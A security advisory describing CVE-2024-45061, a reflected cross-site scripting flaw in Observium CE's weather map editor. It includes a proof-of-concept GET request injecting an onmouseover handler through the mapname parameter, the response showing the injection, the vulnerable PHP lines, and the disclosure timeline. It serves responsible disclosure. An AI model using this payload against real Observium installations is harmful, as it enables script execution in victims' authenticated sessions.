CVE-2024-45061
A cross-site scripting (xss) vulnerability exists in the weather map editor functionality of Observium CE 24.4.13528. A specially crafted HTTP request can lead to a arbitrary javascript code execution. An authenticated user would need to click a malicious link provided by the attacker.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Observium CE 24.4.13528
Observium - https://www.observium.org/
8.7 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
Observium is a web-based network monitoring platform designed for network performance monitoring, infrastructure health management, and alerting. It provides automatic discovery of network devices, and supports a wide range of hardware and software platforms, including routers, switches, servers, and applications.
A reflected cross-site scripting vulneraility exist in weather map editor. An attacker setting a proper value of mapname variable is able to inject arbitrary javascript code inside Observium web page.
To trigger this vulnerability an attacker needs to force victim’s browser to send the following http request:
GET /weathermap.php?mapname=XXX%22%20onmouseover=alert(1)%20%22xx HTTP/1.1
Host: 192.168.0.40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: OBSID=88qksk09eipgc3jshjg6lij9a8; wmeditor=0%3A0%3A0; OBSID=hchgpi1ribgcu2tpnppjusbuu3
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Response
HTTP/1.1 200 OK
Date: Fri, 11 Oct 2024 11:26:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: wmeditor=0%3A0%3A0; expires=Sun, 10-Nov-2024 11:26:59 GMT; Max-Age=2592000
Vary: Accept-Encoding
Content-Length: 34760
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
We can observe injected code in page body:
<div class="box box-solid">
<form action="/wmap/mapname=XXX" onmouseover=alert(1) "xx/edit=1/" method="post" name="frmMain">
<div align="center" id="mainarea">
<input type="hidden" name="plug" value="0"/>
<input style="display:none" type="image"
Vulnerable code is located in the following php file
//includes/weathermap/editor.php
Line 104 $editor_name = "/wmap/mapname=" . $mapname . "/edit=1/";
(...)
Line 917 <div class="box box-solid">
Line 919 <form action="<?php echo $editor_name ?>" method="post" name="frmMain">
Line 920 <div align="center" id="mainarea">
By clicking the malicious link, injected javascript code would execute in the context of authenticated user.
2024-10-23 - Initial Vendor Contact
2024-10-23 - Vendor Disclosure
2024-12-24 - Vendor Patch Release
2025-01-15 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.